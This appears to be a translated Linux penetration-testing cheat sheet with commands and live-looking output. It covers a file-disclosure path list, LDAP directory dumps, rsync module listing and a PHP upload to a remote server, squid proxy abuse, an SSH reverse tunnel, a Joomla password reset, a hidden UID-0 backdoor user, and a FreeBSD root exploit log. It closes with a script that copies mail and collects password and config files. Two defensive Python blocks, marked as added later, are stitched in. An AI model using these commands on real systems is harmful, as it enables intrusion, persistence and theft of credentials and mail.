Linux Penetration and Privilege Escalation Tips

A collection of Linux penetration techniques and privilege-escalation notes, so that you can work more efficiently in future penetration tests.


Some common paths on Linux systems:

/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_log.old
/usr/local/apache/logs/error_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh

LDAP tips:

cat /etc/nsswitch.conf

Look at the password lookup policy; here you can see that the "files ldap" mode is in use.

less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

This gives you the ou and dc settings.

Looking up administrator information

Anonymous bind:

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

With a password:

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

Return at most 10 user records (-p specifies the port):

ldapsearch -h 192.168.2.2 -x -z 10 -p <port>

Penetration in practice:

1. Return all attributes

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous


2. View the base entry

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain


3. Search with an empty base DN (root DSE)

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
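The root DSE output above tells a defender which LDAP protocol versions and TLS cipher suites the directory still accepts. The following added Python example (not code from the original post) parses LDIF of that shape into a dictionary and flags legacy suites and LDAPv2 support; SAMPLE_ROOTDSE is a constructed excerpt and WEAK_MARKERS is an assumed heuristic list, not a standard.

```python
# Constructed sample in the shape of the root DSE output above; it is not a
# capture from the server on the page and only a handful of suites are listed.
SAMPLE_ROOTDSE = """\
version: 1
dn:
objectClass: top
namingContexts: dc=example,dc=com
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
"""

# Assumed markers of a weak suite: no encryption, export grade, RC4, RC2,
# single DES, MD5 MACs and the SSLv2-era SSL_CK_ prefix (3DES is not flagged).
WEAK_MARKERS = ("NULL", "EXPORT", "RC4", "RC2", "_DES_", "MD5", "SSL_CK_")


def parse_ldif(text):
    """Parse one LDIF entry into {attribute: [values]}.
    A line starting with a space continues the previous value."""
    attrs, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith(" ") and last is not None:
            attrs[last][-1] += line[1:]
            continue
        key, _, value = line.partition(":")
        attrs.setdefault(key, []).append(value.strip())
        last = key
    return attrs


def audit_rootdse(text):
    """Report weak TLS suites, LDAPv2 support and the naming contexts
    found in the output of ldapsearch -b "" -s base."""
    attrs = parse_ldif(text)
    suites = attrs.get("supportedSSLCiphers", [])
    return {
        "weak_ciphers": sorted(s for s in suites
                               if any(m in s for m in WEAK_MARKERS)),
        "ldapv2": "2" in attrs.get("supportedLDAPVersion", []),
        "naming_contexts": attrs.get("namingContexts", []),
    }
```

Feed it the real output (for example `ldapsearch ... | python3 -c 'import sys, audit; print(audit.audit_rootdse(sys.stdin.read()))'`) to get the same report for a live server.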


NFS tips:

List the exports of a host:

showmount -e ip


rsync tips:

1. List the modules on the rsync server

rsync 210.51.X.X::


finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book


View the corresponding subdirectory (note: you must append a / after the module name)

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2. Download the configuration files from the rsync server

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3. Push a file up to the rsync server (the upload succeeds and does not overwrite existing files)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

http://app.finance.xxx.com/warn/nothack.txt


Squid tips:

nc -vv 91ri.org 80

GET http://www.sina.com/ HTTP/1.0

GET http://www.sina.com:22/ HTTP/1.0


SSH port forwarding:


ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip


Joomla tips:

Determine the version

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

Reset the password

index.php?option=com_user&view=reset&layout=confirm


Adding a second root-equivalent user (UID 0) on Linux:

useradd -o -u 0 nothack
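Because useradd -o -u 0 leaves a second UID-0 entry in /etc/passwd, the defender-side check is to parse that file and report any non-root account with UID 0. This added Python example (not code from the original post) does that on a constructed passwd sample and also lists accounts with an interactive shell, which is what the page's `grep -i sh` approximates; NOLOGIN_SHELLS is an assumed list.

```python
# Constructed sample /etc/passwd, not from any real host. The last line is
# what "useradd -o -u 0 nothack" leaves behind: a second account with UID 0.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
alice:x:1001:1001:Alice:/home/alice:/bin/bash
nothack:x:0:0::/home/nothack:/bin/bash
"""

# Assumed set of shells that deny interactive login.
NOLOGIN_SHELLS = ("/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false")


def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for every well-formed passwd line;
    blanks, comments and lines with the wrong field count are skipped."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        yield fields[0], int(fields[2]), int(fields[3]), fields[5], fields[6]


def find_extra_uid0(text):
    """Accounts other than root that share UID 0 (root-equivalent logins)."""
    return [name for name, uid, _gid, _home, _shell in parse_passwd(text)
            if uid == 0 and name != "root"]


def find_login_shells(text):
    """Accounts with an interactive shell. The page's `grep -i sh` also matches
    lines where only the user name contains "sh" (e.g. sshd); checking the
    shell field avoids that false positive."""
    return [name for name, _uid, _gid, _home, shell in parse_passwd(text)
            if shell and shell not in NOLOGIN_SHELLS]
```

Run it against the real file with `find_extra_uid0(open("/etc/passwd").read())`; any name it returns deserves an explanation in the change log.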


FreeBSD local privilege escalation:

[argp@julius ~]$ uname -rsi
freebsd 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@julius ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex
calling nmount()


Packing a directory with tar:

tar packing (the --exclude options drop *.gif files and the directory /xx/xx/*):

tar -cvf /home/public_html.tar /home/public_html --exclude='*.gif' --exclude='/xx/xx/*'

ALZip packing (Korean): alzip -a D:\WEB d:\web*.rar

About tar packing: Linux does not determine the file type by its extension.

For a compressed archive, tar -ztf *.tar.gz lists the contents of the archive and tar -zxf *.tar.gz extracts it.

So this form is preferable:

tar -czf /home/public_html.tar.gz /home/public_html --exclude='*.gif' --exclude='/xx/xx/*'


System information gathering:

For Linux:

#!/bin/bash
# Section headers must be quoted: an unquoted # starts a shell comment and echo prints nothing.
echo "####### getting sysinfo ####"
echo "###### usage: ./getinfo.sh >/tmp/sysinfo.txt"
echo "####### basic information ##"
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
###### stole the mail...... ######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo "ur id is $(id)"
echo "### atq & crontab #####"
atq
crontab -l
echo "##### about var #####"
set
echo "##### about network ###"
#### this is the point in pentest, but i am a new bird, so u need to add some in it
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "######## user ####"
cat /etc/passwd | grep -i sh
echo "###### service ####"
chkconfig --list
for i in oracle mysql tomcat samba apache ftp; do
    cat /etc/passwd | grep -i "$i"
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>/dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
### maybe can use "tree /" ###
echo "## packing up #########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

